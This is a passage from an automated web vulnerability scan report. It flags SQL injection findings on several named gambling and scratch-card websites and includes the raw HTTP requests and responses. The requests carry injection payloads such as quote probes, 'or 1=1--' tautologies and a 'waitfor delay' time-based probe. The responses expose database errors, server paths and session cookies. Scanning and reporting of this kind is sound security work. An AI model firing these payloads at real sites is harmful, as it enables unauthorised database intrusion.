Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:33 GMT
Connection: close
Content-Length: 102686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView(
...[SNIP]...

Request 2

GET /en/Sports/World-Champions HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:34 GMT
Connection: close
Content-Length: 102699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="To
...[SNIP]...

1.6. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /images/games_ENG.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /images'/games_ENG.swf HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /images''/games_ENG.swf HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.7. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /images/games_ENG.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /images/games_ENG.swf' HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:30 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9685

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /images/games_ENG.swf'' HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.8. http://scratch.co.uk/resources/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /resources/style.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources'/style.css HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:33 GMT; path=/
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /resources''/style.css HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:34 GMT; path=/
Content-Type: text/html
Content-Length: 9501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.9. http://scratch.co.uk/resources/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /resources/style.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources/style.css' HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:00 GMT; path=/
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /resources/style.css'' HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:30:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:02 GMT; path=/
Content-Type: text/html
Content-Length: 9608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.10. http://trk.primescratchcards.com/ [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.primescratchcards.com
Path:   /

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the ac parameter. The application took 21463 milliseconds to respond to the request, compared with 202 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /?ac=51waitfor%20delay'0%3a0%3a20'--&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 11:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 531
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=LGFGLCIAIFPMDMCAJENJMCKD; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 51waitfor delay'0:0:20'-- ,130137 ,5143, 201105160000 <font face="Arial" size=2>
<p>Microsoft OLE DB Provid
...[SNIP]...

1.11. http://www.interwetten.org/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.interwetten.org
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.interwetten.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:10:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6798

<html>
<head>
<title>Syntaxfehler in Zeichenfolge in Abfrageausdruck ''http://www.google.com/search?hl=en&amp;q='')'.</title>
<style>
body {font-family:"Verdana";font-
...[SNIP]...
</b>System.Data.OleDb.OleDbException: Syntaxfehler in Zeichenfolge in Abfrageausdruck ''http://www.google.com/search?hl=en&amp;q='')'.<br>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.interwetten.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=daqivy3db3w1hk455t45bdvf; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hom
...[SNIP]...

1.12. http://www.neogames.com/our-partners [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /our-partners

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 45542616%20or%201%3d1--%20 and 45542616%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /our-partners?145542616%20or%201%3d1--%20=1 HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Length: 32146
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td></tr>
                   </table>
               </td>

           </table>
               
       </td></tr>
   </table>
           

</td></tr>

</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2893517-14");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>


Request 2

GET /our-partners?145542616%20or%201%3d2--%20=1 HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Length: 31988
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:36:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>





                       </td></tr>
                   </table>
               </td>

           </table>
               
       </td></tr>
   </table>
           

</td></tr>

</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2893517-14");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>



1.13. http://www.neogames.com/outbound/article/www.bet365.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /outbound/article/www.bet365.com

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14417416'%20or%201%3d1--%20 and 14417416'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /outbound/article/www.bet365.com?114417416'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
